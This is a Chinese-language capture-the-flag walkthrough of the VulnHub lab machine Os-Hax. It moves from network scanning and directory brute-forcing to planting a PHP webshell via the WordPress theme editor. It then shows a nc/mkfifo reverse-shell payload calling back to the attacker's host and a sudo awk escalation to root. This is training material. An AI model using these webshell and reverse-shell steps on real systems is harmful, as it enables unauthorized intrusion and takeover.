vulnhub靶机 Os-Hax

下载靶机

地址 :hackNos: Os-Hax ~ VulnHub

问题阐述

使用virtualbox,kali和靶机均使用桥接网络

kali:172.20.10.10 靶机:172.20.10.12

打靶目标

获取到root权限

打靶过程

信息搜集

nmap主机探活,做端口扫描

nmap -v -sP 172.20.10.1/24

nmap -sV -sC 172.20.10.12

gobuster 扫描目录 发现一个wordpress 和其他路径

gobuster dir -u http://172.20.10.12 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt      // -w指定字典路径

直接做访问 发现提示文件flaghost.png

 下载 flaghost.png 查看图片属性 exiftool flaghost.png 得到字符 passwd@45

 本俩以为是wordpress账号密码,尝试发现不是,最后发现是路径,直接访问有一个flag2.txt文件

,打开是加密字符,在线解密(Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]),获得flag

web:Hacker@4514

 权限提升

修改hosts文件。做域名解析

vim /etc/hosts

写入以下内容

172.20.10.12 localhost

 直接访问:http://localhost/wordpress/wp-admin/theme-editor.php?file=header.php&theme=twentynineteen

写入一句话木马 <?php system($_POST['cmd']);?>

进行反弹shell

本地开启监听

nc -lvnp 9001

burpsuit 抓包写反弹shell,等待本地接收连接

cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+172.20.10.10+9001+>/tmp/f

 切换到交互式shell

python3 -c 'import pty;import pty.spawn("/bin/bash")'

用之前获取到的信息进行登录

su web
输入密码 Hacker@4514

 特权提升

sudo -l 看到可以使用 awk 命令

调用 system 函数成功提权到 root 
sudo awk '{ system("/bin/bash")}' 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉城木槿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值